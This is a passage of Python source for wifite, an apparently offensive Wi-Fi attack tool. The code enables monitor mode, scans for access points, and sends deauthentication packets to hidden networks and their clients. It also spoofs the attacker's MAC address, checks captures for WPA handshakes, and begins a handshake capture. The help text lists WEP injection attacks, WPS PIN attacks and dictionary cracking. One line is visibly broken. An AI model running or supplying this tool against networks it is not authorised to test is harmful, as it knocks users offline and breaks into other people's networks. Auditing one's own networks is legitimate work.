print sw+'\t-wpadt '+var+'<sec> \t'+des+'time to wait between sending deauth packets (sec) '+de+'[10]'+W
print sw+'\t-strip \t'+des+'strip handshake using tshark or pyrit '+de+'[off]'+W
print sw+'\t-crack '+var+'<dic>\t'+des+'crack WPA handshakes using '+var+'<dic>'+des+' wordlist file '+de+'[off]'+W
print sw+'\t-dict '+var+'<file>\t'+des+'specify dictionary to use when cracking WPA '+de+'[phpbb.txt]'+W
print sw+'\t-aircrack \t'+des+'verify handshake using aircrack '+de+'[on]'+W
print sw+'\t-pyrit \t'+des+'verify handshake using pyrit '+de+'[off]'+W
print sw+'\t-tshark \t'+des+'verify handshake using tshark '+de+'[on]'+W
print sw+'\t-cowpatty \t'+des+'verify handshake using cowpatty '+de+'[off]'+W
print head+'\n WEP'+W
print sw+'\t-wep \t'+des+'only target WEP networks '+de+'[off]'+W
print sw+'\t-pps '+var+'<num> \t'+des+'set the number of packets per second to inject '+de+'[600]'+W
print sw+'\t-wept '+var+'<sec> \t'+des+'sec to wait for each attack, 0 implies endless '+de+'[600]'+W
print sw+'\t-chopchop \t'+des+'use chopchop attack '+de+'[on]'+W
print sw+'\t-arpreplay \t'+des+'use arpreplay attack '+de+'[on]'+W
print sw+'\t-fragment \t'+des+'use fragmentation attack '+de+'[on]'+W
print sw+'\t-caffelatte \t'+des+'use caffe-latte attack '+de+'[on]'+W
print sw+'\t-p0841 \t'+des+'use -p0841 attack '+de+'[on]'+W
print sw+'\t-hirte \t'+des+'use hirte (cfrag) attack '+de+'[on]'+W
print sw+'\t-nofakeauth \t'+des+'stop attack if fake authentication fails '+de+'[off]'+W
print sw+'\t-wepca '+GR+'<n> \t'+des+'start cracking when number of ivs surpass n '+de+'[10000]'+W
print sw+'\t-wepsave \t'+des+'save a copy of .cap files to this directory '+de+'[off]'+W
print head+'\n WPS'+W
print sw+'\t-wps \t'+des+'only target WPS networks '+de+'[off]'+W
print sw+'\t-wpst '+var+'<sec> \t'+des+'max wait for new retry before giving up (0: never) '+de+'[660]'+W
print sw+'\t-wpsratio '+var+'<per>\t'+des+'min ratio of successful PIN attempts/total tries '+de+'[0]'+W
print sw+'\t-wpsretry '+var+'<num>\t'+des+'max number of retries for same PIN before giving up '+de+'[0]'+W
print head+'\n EXAMPLE'+W
print sw+'\t./wifite.py '+W+'-wps -wep -c 6 -pps 600'+W
print ''
###########################
# WIRELESS CARD FUNCTIONS #
###########################
def enable_monitor_mode(iface):
"""
Uses airmon-ng to put a device into Monitor Mode.
Then uses the get_iface() method to retrieve the new interface's name.
Sets global variable IFACE_TO_TAKE_DOWN as well.
Returns the name of the interface in monitor mode.
"""
global IFACE_TO_TAKE_DOWN
print GR+' [+]'+W+' enabling monitor mode on %s...' % (G+iface+W),
stdout.flush()
call(['airmon-ng', 'start', iface], stdout=DN, stderr=DN)
print 'done'
IFACE_TO_TAKE_DOWN = get_iface()
return IFACE_TO_TAKE_DOWN
def disable_monitor_mode():
"""
The program may have enabled monitor mode on a wireless interface.
We want to disable this before we exit, so we will do that.
"""
if IFACE_TO_TAKE_DOWN == '': return
print GR+' [+]'+W+' disabling monitor mode on %s...' % (G+IFACE_TO_TAKE_DOWN+W),
stdout.flush()
call(['airmon-ng', 'stop', IFACE_TO_TAKE_DOWN], stdout=DN, stderr=DN)
print 'done'
PRINTED_SCANNING = False
def get_iface():
"""
Get the wireless interface in monitor mode.
Defaults to only device in monitor mode if found.
Otherwise, enumerates list of possible wifi devices
and asks user to select one to put into monitor mode (if multiple).
Uses airmon-ng to put device in monitor mode if needed.
Returns the name (string) of the interface chosen in monitor mode.
"""
global PRINTED_SCANNING
if not PRINTED_SCANNING:
print GR+' [+]'+W+' scanning for wireless devices...'
PRINTED_SCANNING = True
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
iface = ''
monitors = []
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue
if ord(line[0]) != 32: # Doesn't start with space
iface = line[:line.find(' ')] # is the interface
if line.find('Mode:Monitor') != -1:
monitors.append(iface)
if WIRELESS_IFACE != '':
if monitors.count(WIRELESS_IFACE): return WIRELESS_IFACE
print R+' [!]'+O+' could not find wireless interface %s' % ('"'+R+WIRELESS_IFACE+O+'"'+W)
if len(monitors) == 1:
return monitors[0] # Default to only device in monitor mode
elif len(monitors) > 1:
print GR+" [+]"+W+" interfaces in "+G+"monitor mode:"+W
for i, monitor in enumerate(monitors):
print " %s. %s" % (G+str(i+1)+W, G+monitor+W)
ri = raw_input("%s [+]%s select %snumber%s of interface to use for capturing (%s1-%d%s): %s" % \
(GR, W, G, W, G, len(monitors), W, G))
while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
ri = raw_input("%s [+]%s select number of interface to use for capturing (%s1-%d%s): %s" % \
(GR, W, G, len(monitors), W, G))
i = int(ri)
return monitors[i - 1]
proc = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if len(line) == 0 or line.startswith('Interface'): continue
#monitors.append(line[:line.find('\t')])
monitors.append(line)
if len(monitors) == 0:
print R+' [!]'+O+" no wireless interfaces were found."+W
print R+' [!]'+O+" you need to plug in a wifi device or install drivers.\n"+W
exit_gracefully(0)
elif WIRELESS_IFACE != '' and monitors.count(WIRELESS_IFACE) > 0:
mac_anonymize(monitor)
return enable_monitor-mode
elif len(monitors) == 1:
monitor = monitors[0][:monitors[0].find('\t')]
mac_anonymize(monitor)
return enable_monitor_mode(monitor)
print GR+" [+]"+W+" available wireless devices:"
for i, monitor in enumerate(monitors):
print " %s%d%s. %s" % (G, i + 1, W, monitor)
ri = raw_input(GR+" [+]"+W+" select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
ri = raw_input(" [+] select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
i = int(ri)
monitor = monitors[i-1][:monitors[i-1].find('\t')]
mac_anonymize(monitor)
return enable_monitor_mode(monitor)
######################
# SCANNING FUNCTIONS #
######################
def scan(channel=0, iface='', tried_rtl8187_fix=False):
"""
Scans for access points. Asks user to select target(s).
"channel" - the channel to scan on, 0 scans all channels.
"iface" - the interface to scan on. must be a real interface.
"tried_rtl8187_fix" - We have already attempted to fix "Unknown error 132"
Returns list of selected targets and list of clients.
"""
remove_airodump_files(temp + 'wifite')
command = ['airodump-ng',
'-a', # only show associated clients
'-w', temp + 'wifite'] # output file
if channel != 0:
command.append('-c')
command.append(str(channel))
command.append(iface)
proc = Popen(command, stdout=DN, stderr=DN)
time_started = time.time()
print GR+' [+] '+G+'initializing scan'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.'
(targets, clients) = ([], [])
try:
deauth_sent = 0.0
old_targets = []
stop_scanning = False
while True:
time.sleep(0.3)
if not os.path.exists(temp + 'wifite-01.csv') and time.time() - time_started > 1.0:
print R+'\n [!] ERROR!'+W
# RTL8187 Unknown Error 132 FIX
if proc.poll() != None: # Check if process has finished
proc = Popen(['airodump-ng', iface], stdout=DN, stderr=PIPE)
if not tried_rtl8187_fix and proc.communicate()[1].find('failed: Unknown error 132') != -1:
if rtl8187_fix(iface):
return scan(channel=channel, iface=iface, tried_rtl8187_fix=True)
print R+' [!]'+O+' wifite is unable to generate airodump-ng output files'+W
print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
exit_gracefully(1)
(targets, clients) = parse_csv(temp + 'wifite-01.csv')
# If we are targeting a specific ESSID/BSSID, skip the scan once we find it.
if TARGET_ESSID != '':
for t in targets:
if t.ssid.lower() == TARGET_ESSID.lower():
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
targets = [t]
stop_scanning = True
break
if TARGET_BSSID != '':
for t in targets:
if t.bssid.lower() == TARGET_BSSID.lower():
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
targets = [t]
stop_scanning = True
break
# If user has chosen to target all access points, wait 20 seconds, then return all
if ATTACK_ALL_TARGETS and time.time() - time_started > 10:
print GR+'\n [+]'+W+' auto-targeted %s%d%s access point%s' % (G, len(targets), W, '' if len(targets) == 1 else 's')
stop_scanning = True
if ATTACK_MIN_POWER > 0 and time.time() - time_started > 10:
# Remove targets with power < threshold
i = 0
before_count = len(targets)
while i < len(targets):
if targets[i].power < ATTACK_MIN_POWER:
targets.pop(i)
else: i += 1
print GR+'\n [+]'+W+' removed %s targets with power < %ddB, %s remain' % \
(G+str(before_count - len(targets))+W, ATTACK_MIN_POWER, G+str(len(targets))+W)
stop_scanning = True
if stop_scanning: break
# If there are unknown SSIDs, send deauths to them.
if channel != 0 and time.time() - deauth_sent > 5:
deauth_sent = time.time()
for t in targets:
if t.ssid == '':
print "\r %s deauthing hidden access point (%s) \r" % \
(GR+sec_to_hms(time.time() - time_started)+W, G+t.bssid+W),
stdout.flush()
# Time to deauth
cmd = ['aireplay-ng',
'--deauth', '1',
'-a', t.bssid]
for c in clients:
if c.station == t.bssid:
cmd.append('-c')
cmd.append(c.bssid)
break
cmd.append(iface)
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
proc_aireplay.wait()
time.sleep(0.5)
else:
for ot in old_targets:
if ot.ssid == '' and ot.bssid == t.bssid:
print '\r %s successfully decloaked "%s" ' % \
(GR+sec_to_hms(time.time() - time_started)+W, G+t.ssid+W)
old_targets = targets[:]
if VERBOSE_APS and len(targets) > 0:
targets = sorted(targets, key=lambda t: t.power, reverse=True)
if not WPS_DISABLE:
wps_check_targets(targets, temp + 'wifite-01.cap', verbose=False)
os.system('clear')
print GR+'\n [+] '+G+'scanning'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.\n'
print " NUM ESSID %sCH ENCR POWER WPS? CLIENT" % ('BSSID ' if SHOW_MAC_IN_SCAN else '')
print ' --- -------------------- %s-- ---- ----- ---- ------' % ('----------------- ' if SHOW_MAC_IN_SCAN else '')
for i, target in enumerate(targets):
print " %s%2d%s " % (G, i + 1, W),
# SSID
if target.ssid == '':
p = O+'('+target.bssid+')'+GR+' '+W
print '%s' % p.ljust(20),
elif ( target.ssid.count('\x00') == len(target.ssid) ):
p = '<Length '+str(len(target.ssid))+'>'
print '%s' % C+p.ljust(20)+W,
elif len(target.ssid) <= 20:
print "%s" % C+target.ssid.ljust(20)+W,
else:
print "%s" % C+target.ssid[0:17] + '...'+W,
# BSSID
if SHOW_MAC_IN_SCAN:
print O,target.bssid+W,
# Channel
print G+target.channel.rjust(3),W,
# Encryption
if target.encryption.find("WEP") != -1: print G,
else: print O,
print "\b%3s" % target.encryption.strip().ljust(4) + W,
# Power
if target.power >= 55: col = G
elif target.power >= 40: col = O
else: col = R
print "%s%3ddb%s" % (col,target.power, W),
# WPS
if WPS_DISABLE:
print " %3s" % (O+'n/a'+W),
else:
print " %3s" % (G+'wps'+W if target.wps else R+' no'+W),
# Clients
client_text = ''
for c in clients:
if c.station == target.bssid:
if client_text == '': client_text = 'client'
elif client_text[-1] != "s": client_text += "s"
if client_text != '': print ' %s' % (G+client_text+W)
else: print ''
print ''
print ' %s %s wireless networks. %s target%s and %s client%s found \r' % (
GR+sec_to_hms(time.time() - time_started)+W, G+'scanning'+W,
G+str(len(targets))+W, '' if len(targets) == 1 else 's',
G+str(len(clients))+W, '' if len(clients) == 1 else 's'),
stdout.flush()
except KeyboardInterrupt:
pass
print ''
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
# Use "wash" program to check for WPS compatibility
if not WPS_DISABLE:
wps_check_targets(targets, temp + 'wifite-01.cap')
remove_airodump_files(temp + 'wifite')
if stop_scanning: return (targets, clients)
print ''
if len(targets) == 0:
print R+' [!]'+O+' no targets found!'+W
print R+' [!]'+O+' you may need to wait for targets to show up.'+W
print ''
exit_gracefully(1)
if VERBOSE_APS: os.system('clear')
# Sort by Power
targets = sorted(targets, key=lambda t: t.power, reverse=True)
victims = []
print " NUM ESSID %sCH ENCR POWER WPS? CLIENT" % ('BSSID ' if SHOW_MAC_IN_SCAN else '')
print ' --- -------------------- %s-- ---- ----- ---- ------' % ('----------------- ' if SHOW_MAC_IN_SCAN else '')
for i, target in enumerate(targets):
print " %s%2d%s " % (G, i + 1, W),
# SSID
if target.ssid == '':
p = O+'('+target.bssid+')'+GR+' '+W
print '%s' % p.ljust(20),
elif ( target.ssid.count('\x00') == len(target.ssid) ):
p = '<Length '+str(len(target.ssid))+'>'
print '%s' % C+p.ljust(20)+W,
elif len(target.ssid) <= 20:
print "%s" % C+target.ssid.ljust(20)+W,
else:
print "%s" % C+target.ssid[0:17] + '...'+W,
# BSSID
if SHOW_MAC_IN_SCAN:
print O,target.bssid+W,
# Channel
print G+target.channel.rjust(3),W,
# Encryption
if target.encryption.find("WEP") != -1: print G,
else: print O,
print "\b%3s" % target.encryption.strip().ljust(4) + W,
# Power
if target.power >= 55: col = G
elif target.power >= 40: col = O
else: col = R
print "%s%3ddb%s" % (col,target.power, W),
# WPS
if WPS_DISABLE:
print " %3s" % (O+'n/a'+W),
else:
print " %3s" % (G+'wps'+W if target.wps else R+' no'+W),
# Clients
client_text = ''
for c in clients:
if c.station == target.bssid:
if client_text == '': client_text = 'client'
elif client_text[-1] != "s": client_text += "s"
if client_text != '': print ' %s' % (G+client_text+W)
else: print ''
ri = raw_input(GR+"\n [+]"+W+" select "+G+"target numbers"+W+" ("+G+"1-%s)" % (str(len(targets))+W) + \
" separated by commas, or '%s': " % (G+'all'+W))
if ri.strip().lower() == 'all':
victims = targets[:]
else:
for r in ri.split(','):
r = r.strip()
if r.find('-') != -1:
(sx, sy) = r.split('-')
if sx.isdigit() and sy.isdigit():
x = int(sx)
y = int(sy) + 1
for v in xrange(x, y):
victims.append(targets[v - 1])
elif not r.isdigit() and r.strip() != '':
print O+" [!]"+R+" not a number: %s " % (O+r+W)
elif r != '':
victims.append(targets[int(r) - 1])
if len(victims) == 0:
print O+'\n [!] '+R+'no targets selected.\n'+W
exit_gracefully(0)
print ''
print ' [+] %s%d%s target%s selected.' % (G, len(victims), W, '' if len(victims) == 1 else 's')
return (victims, clients)
def parse_csv(filename):
"""
Parses given lines from airodump-ng CSV file.
Returns tuple: List of targets and list of clients.
"""
if not os.path.exists(filename): return ([], [])
try:
f = open(filename, 'r')
lines = f.read().split('\n')
f.close()
except IOError: return ([], [])
hit_clients = False
targets = []
clients = []
for line in lines:
if line.startswith('Station MAC,'): hit_clients = True
if line.startswith('BSSID') or line.startswith('Station MAC') or line.strip() == '': continue
if not hit_clients: # Access points
c = line.split(', ', 13)
if len(c) <= 11: continue
cur = 11
c[cur] = c[cur].strip()
if not c[cur].isdigit(): cur += 1
if cur > len(c) - 1: continue
ssid = c[cur+1]
ssidlen = int(c[cur])
ssid = ssid[:ssidlen]
power = int(c[cur-4])
if power < 0: power += 100
enc = c[5]
# Ignore non-WPA/WEP networks.
if enc.find('WPA') == -1 and enc.find('WEP') == -1: continue
if WEP_DISABLE and enc.find('WEP') != -1: continue
if WPA_DISABLE and WPS_DISABLE and enc.find('WPA') != -1: continue
enc = enc.strip()[:4]
t = Target(c[0], power, c[cur-2].strip(), c[3], enc, ssid)
targets.append(t)
else: # Connected clients
c = line.split(', ')
if len(c) < 6: continue
bssid = re.sub(r'[^a-zA-Z0-9:]', '', c[0])
station = re.sub(r'[^a-zA-Z0-9:]', '', c[5])
power = c[3]
if station != 'notassociated':
c = Client(bssid, station, power)
clients.append(c)
return (targets, clients)
def wps_check_targets(targets, cap_file, verbose=True):
"""
Uses reaver's "walsh" (or wash) program to check access points in cap_file
for WPS functionality. Sets "wps" field of targets that match to True.
"""
global WPS_DISABLE
if not program_exists('walsh') and not program_exists('wash'):
WPS_DISABLE = True # Tell 'scan' we were unable to execute walsh
return
program_name = 'walsh' if program_exists('walsh') else 'wash'
if len(targets) == 0 or not os.path.exists(cap_file): return
if verbose:
print GR+' [+]'+W+' checking for '+G+'WPS compatibility'+W+'...',
stdout.flush()
cmd = [program_name,
'-f', cap_file,
'-C'] # ignore Frame Check Sum errors
proc_walsh = Popen(cmd, stdout=PIPE, stderr=DN)
proc_walsh.wait()
for line in proc_walsh.communicate()[0].split('\n'):
if line.strip() == '' or line.startswith('Scanning for'): continue
bssid = line.split(' ')[0]
for t in targets:
if t.bssid.lower() == bssid.lower():
t.wps = True
if verbose:
print 'done'
removed = 0
if not WPS_DISABLE and WPA_DISABLE:
i = 0
while i < len(targets):
if not targets[i].wps and targets[i].encryption.find('WPA') != -1:
removed += 1
targets.pop(i)
else: i += 1
if removed > 0 and verbose: print GR+' [+]'+O+' removed %d non-WPS-enabled targets%s' % (removed, W)
def rtl8187_fix(iface):
"""
Attempts to solve "Unknown error 132" common with RTL8187 devices.
Puts down interface, unloads/reloads driver module, then puts iface back up.
Returns True if fix was attempted, False otherwise.
"""
# Check if current interface is using the RTL8187 chipset
proc_airmon = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
proc_airmon.wait()
using_rtl8187 = False
for line in proc_airmon.communicate()[0].split():
line = line.upper()
if line.strip() == '' or line.startswith('INTERFACE'): continue
if line.find(iface.upper()) and line.find('RTL8187') != -1: using_rtl8187 = True
if not using_rtl8187:
# Display error message and exit
print R+' [!]'+O+' unable to generate airodump-ng CSV file'+W
print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
exit_gracefully(1)
print O+" [!]"+W+" attempting "+O+"RTL8187 'Unknown Error 132'"+W+" fix..."
original_iface = iface
# Take device out of monitor mode
airmon = Popen(['airmon-ng', 'stop', iface], stdout=PIPE, stderr=DN)
airmon.wait()
for line in airmon.communicate()[0].split('\n'):
if line.strip() == '' or \
line.startswith("Interface") or \
line.find('(removed)') != -1:
continue
original_iface = line.split()[0] # line[:line.find('\t')]
# Remove drive modules, block/unblock ifaces, probe new modules.
print_and_exec(['ifconfig', original_iface, 'down'])
print_and_exec(['rmmod', 'rtl8187'])
print_and_exec(['rfkill', 'block', 'all'])
print_and_exec(['rfkill', 'unblock', 'all'])
print_and_exec(['modprobe', 'rtl8187'])
print_and_exec(['ifconfig', original_iface, 'up'])
print_and_exec(['airmon-ng', 'start', original_iface])
print '\r \r',
print O+' [!] '+W+'restarting scan...\n'
return True
def print_and_exec(cmd):
"""
Prints and executes command "cmd". Also waits half a second
Used by rtl8187_fix (for prettiness)
"""
print '\r \r',
stdout.flush()
print O+' [!] '+W+'executing: '+O+' '.join(cmd) + W,
stdout.flush()
call(cmd, stdout=DN, stderr=DN)
time.sleep(0.1)
####################
# HELPER FUNCTIONS #
####################
def remove_airodump_files(prefix):
"""
Removes airodump output files for whatever file prefix ('wpa', 'wep', etc)
Used by wpa_get_handshake() and attack_wep()
"""
remove_file(prefix + '-01.cap')
remove_file(prefix + '-01.csv')
remove_file(prefix + '-01.kismet.csv')
remove_file(prefix + '-01.kismet.netxml')
for filename in os.listdir(temp):
if filename.lower().endswith('.xor'): remove_file(temp + filename)
for filename in os.listdir('.'):
if filename.startswith('replay_') and filename.endswith('.cap'):
remove_file(filename)
if filename.endswith('.xor'): remove_file(filename)
# Remove .cap's from previous attack sessions
"""i = 2
while os.path.exists(temp + 'wep-' + str(i) + '.cap'):
os.remove(temp + 'wep-' + str(i) + '.cap')
i += 1
"""
def remove_file(filename):
"""
Attempts to remove a file. Does not throw error if file is not found.
"""
try: os.remove(filename)
except OSError: pass
def program_exists(program):
"""
Uses 'which' (linux command) to check if a program is installed.
"""
proc = Popen(['which', program], stdout=PIPE, stderr=PIPE)
txt = proc.communicate()
if txt[0].strip() == '' and txt[1].strip() == '':
return False
if txt[0].strip() != '' and txt[1].strip() == '':
return True
return not (txt[1].strip() == '' or txt[1].find('no %s in' % program) != -1)
def sec_to_hms(sec):
"""
Converts integer sec to h:mm:ss format
"""
if sec <= -1: return '[endless]'
h = sec / 3600
sec %= 3600
m = sec / 60
sec %= 60
return '[%d:%02d:%02d]' % (h, m, sec)
def send_interrupt(process):
"""
Sends interrupt signal to process's PID.
"""
try:
os.kill(process.pid, SIGINT)
# os.kill(process.pid, SIGTERM)
except OSError: pass # process cannot be killed
except TypeError: pass # pid is incorrect type
except UnboundLocalError: pass # 'process' is not defined
except AttributeError: pass # Trying to kill "None"
def get_mac_address(iface):
"""
Returns MAC address of "iface".
"""
proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
proc.wait()
mac = ''
first_line = proc.communicate()[0].split('\n')[0]
for word in first_line.split(' '):
if word != '': mac = word
if mac.find('-') != -1: mac = mac.replace('-', ':')
if len(mac) > 17: mac = mac[0:17]
return mac
def generate_random_mac(old_mac):
"""
Generates a random MAC address.
Keeps the same vender (first 6 chars) of the old MAC address (old_mac).
Returns string in format old_mac[0:9] + :XX:XX:XX where X is random hex
"""
random.seed()
new_mac = old_mac[:8].lower().replace('-', ':')
for i in xrange(0, 6):
if i % 2 == 0: new_mac += ':'
new_mac += '0123456789abcdef'[random.randint(0,15)]
# Prevent generating the same MAC address via recursion.
if new_mac == old_mac:
new_mac = generate_random_mac(old_mac)
return new_mac
def mac_anonymize(iface):
"""
Changes MAC address of 'iface' to a random MAC.
Only randomizes the last 6 digits of the MAC, so the vender says the same.
Stores old MAC address and the interface in ORIGINAL_IFACE_MAC
"""
global ORIGINAL_IFACE_MAC
if DO_NOT_CHANGE_MAC: return
if not program_exists('ifconfig'): return
# Store old (current) MAC address
proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
proc.wait()
for word in proc.communicate()[0].split('\n')[0].split(' '):
if word != '': old_mac = word
ORIGINAL_IFACE_MAC = (iface, old_mac)
new_mac = generate_random_mac(old_mac)
call(['ifconfig', iface, 'down'])
print GR+" [+]"+W+" changing %s's MAC from %s to %s..." % (G+iface+W, G+old_mac+W, O+new_mac+W),
stdout.flush()
proc = Popen(['ifconfig', iface, 'hw', 'ether', new_mac], stdout=PIPE, stderr=DN)
proc.wait()
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
print 'done'
def mac_change_back():
"""
Changes MAC address back to what it was before attacks began.
"""
iface = ORIGINAL_IFACE_MAC[0]
old_mac = ORIGINAL_IFACE_MAC[1]
if iface == '' or old_mac == '': return
print GR+" [+]"+W+" changing %s's mac back to %s..." % (G+iface+W, G+old_mac+W),
stdout.flush()
call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
proc = Popen(['ifconfig', iface, 'hw', 'ether', old_mac], stdout=PIPE, stderr=DN)
proc.wait()
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
print "done"
def analyze_capfile(capfile):
"""
Analyzes given capfile for handshakes using various programs.
Prints results to console.
"""
global TARGET_BSSID, TARGET_ESSID
if TARGET_ESSID == '' and TARGET_BSSID == '':
print R+' [!]'+O+' target ssid and bssid are required to check for handshakes'
print R+' [!]'+O+' please enter essid (access point name) using -e <name>'
print R+' [!]'+O+' and/or target bssid (mac address) using -b <mac>\n'
# exit_gracefully(1)
if TARGET_BSSID == '':
# Get the first BSSID found in tshark!
TARGET_BSSID = get_bssid_from_cap(TARGET_ESSID, capfile)
# if TARGET_BSSID.find('->') != -1: TARGET_BSSID == ''
if TARGET_BSSID == '':
print R+' [!]'+O+' unable to guess BSSID from ESSID!'
else:
print GR+' [+]'+W+' guessed bssid: %s' % (G+TARGET_BSSID+W)
if TARGET_BSSID != '' and TARGET_ESSID == '':
TARGET_ESSID = get_essid_from_cap(TARGET_BSSID, capfile)
print GR+'\n [+]'+W+' checking for handshakes in %s' % (G+capfile+W)
t = Target(TARGET_BSSID, '', '', '', 'WPA', TARGET_ESSID)
if program_exists('pyrit'):
result = has_handshake_pyrit(t, capfile)
print GR+' [+]'+W+' '+G+'pyrit'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: pyrit'
if program_exists('cowpatty'):
result = has_handshake_cowpatty(t, capfile, nonstrict=True)
print GR+' [+]'+W+' '+G+'cowpatty'+W+' (nonstrict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
result = has_handshake_cowpatty(t, capfile, nonstrict=False)
print GR+' [+]'+W+' '+G+'cowpatty'+W+' (strict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: cowpatty'
if program_exists('tshark'):
result = has_handshake_tshark(t, capfile)
print GR+' [+]'+W+' '+G+'tshark'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: tshark'
if program_exists('aircrack-ng'):
result = has_handshake_aircrack(t, capfile)
print GR+' [+]'+W+' '+G+'aircrack-ng'+W+':\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
else: print R+' [!]'+O+' program not found: aircrack-ng'
print ''
exit_gracefully(0)
def get_essid_from_cap(bssid, capfile):
"""
Attempts to get ESSID from cap file using BSSID as reference.
Returns '' if not found.
"""
if not program_exists('tshark'): return ''
cmd = ['tshark',
'-r', capfile,
'-R', 'wlan.fc.type_subtype == 0x05 && wlan.sa == %s' % bssid,
'-n']
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
for line in proc.communicate()[0].split('\n'):
if line.find('SSID=') != -1:
essid = line[line.find('SSID=')+5:]
print GR+' [+]'+W+' guessed essid: %s' % (G+essid+W)
return essid
print R+' [!]'+O+' unable to guess essid!'+W
return ''
def get_bssid_from_cap(essid, capfile):
"""
Returns first BSSID of access point found in cap file.
This is not accurate at all, but it's a good guess.
Returns '' if not found.
"""
global TARGET_ESSID
if not program_exists('tshark'): return ''
# Attempt to get BSSID based on ESSID
if essid != '':
cmd = ['tshark',
'-r', capfile,
'-R', 'wlan_mgt.ssid == "%s" && wlan.fc.type_subtype == 0x05' % (essid),
'-n', # Do not resolve MAC vendor names
'-T', 'fields', # Only display certain fields
'-e', 'wlan.sa'] # souce MAC address
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
bssid = proc.communicate()[0].split('\n')[0]
if bssid != '': return bssid
cmd = ['tshark',
'-r', capfile,
'-R', 'eapol',
'-n']
proc = Popen(cmd, stdout=PIPE, stderr=DN)
proc.wait()
for line in proc.communicate()[0].split('\n'):
if line.endswith('Key (msg 1/4)') or line.endswith('Key (msg 3/4)'):
while line.startswith(' ') or line.startswith('\t'): line = line[1:]
line = line.replace('\t', ' ')
while line.find(' ') != -1: line = line.replace(' ', ' ')
return line.split(' ')[2]
elif line.endswith('Key (msg 2/4)') or line.endswith('Key (msg 4/4)'):
while line.startswith(' ') or line.startswith('\t'): line = line[1:]
line = line.replace('\t', ' ')
while line.find(' ') != -1: line = line.replace(' ', ' ')
return line.split(' ')[4]
return ''
def exit_gracefully(code=0):
"""
We may exit the program at any time.
We want to remove the temp folder and any files contained within it.
Removes the temp files/folder and exists with error code "code".
"""
# Remove temp files and folder
if os.path.exists(temp):
for file in os.listdir(temp):
os.remove(temp + file)
os.rmdir(temp)
# Disable monitor mode if enabled by us
disable_monitor_mode()
# Change MAC address back if spoofed
mac_change_back()
print GR+" [+]"+W+" quitting" # wifite will now exit"
print ''
# GTFO
exit(code)
def attack_interrupted_prompt():
"""
Promps user to decide if they want to exit,
skip to cracking WPA handshakes,
or continue attacking the remaining targets (if applicable).
returns True if user chose to exit complete, False otherwise
"""
global TARGETS_REMAINING
should_we_exit = False
# If there are more targets to attack, ask what to do next
if TARGETS_REMAINING > 0:
options = ''
print GR+"\n [+] %s%d%s target%s remain%s" % (G, TARGETS_REMAINING, W,
'' if TARGETS_REMAINING == 1 else 's',
's' if TARGETS_REMAINING == 1 else '')
print GR+" [+]"+W+" what do you want to do?"
options += G+'c'+W
print G+" [c]ontinue"+W+" attacking targets"
if len(WPA_CAPS_TO_CRACK) > 0:
options += W+', '+O+'s'+W
print O+" [s]kip"+W+" to cracking WPA cap files"
options += W+', or '+R+'e'+W
print R+" [e]xit"+W+" completely"
ri = ''
while ri != 'c' and ri != 's' and ri != 'e':
ri = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % options)
if ri == 's':
TARGETS_REMAINING = -1 # Tells start() to ignore other targets, skip to cracking
elif ri == 'e':
should_we_exit = True
return should_we_exit
#################
# WPA FUNCTIONS #
#################
def wpa_get_handshake(iface, target, clients):
"""
Opens an airodump capture on the target, dumping to a file.
During the capture, sends deauthentication packets to the target both as
general deauthentication packets and specific packets aimed at connected clients.
Waits until a handshake is captured.
"iface" - interface to capture on
"target" - Target object containing info on access point
"clients" - List of Client objects associated with the target
Returns True if handshake was found, False otherwise
"""
global TARGETS_REMAINING, WPA_ATTACK_TIMEOUT
if WPA_ATTACK_TIMEOUT <= 0: WPA_ATTACK_TIMEOUT = -1
# Generate the filename to save the .cap file as <SSID>_aa-bb-cc-dd-ee-ff.cap
save_as = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
+ '_' + target.bssid.replace(':', '-') + '.cap'
# Check if we already have a handshake for this SSID... If we do, generate a new filename
save_index = 0
while os.path.exists(save_as):
save_index += 1
save_as = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
+ '_' + target.bssid.replace(':', '-') \
+ '_' + str(save_index) + '.cap'
# Remove previous airodump output files (if needed)
remove_airodump_files(temp + 'wpa')
# Start of large Try-Except; used for catching keyboard interrupt (Ctrl+C)
try:
# Start airodump-ng process to capture handshakes
cmd = ['airodump-ng',
'-w', temp + 'wpa',
'-c', target.channel,
'--bssid', target.bssid, iface]
proc_read = Popen(cmd, stdout=DN, stderr=DN)
# Setting deauthentication process here to avoid errors later on
proc_deauth = None
print ' %s starting %swpa handshake capture%s on "%s"' % \
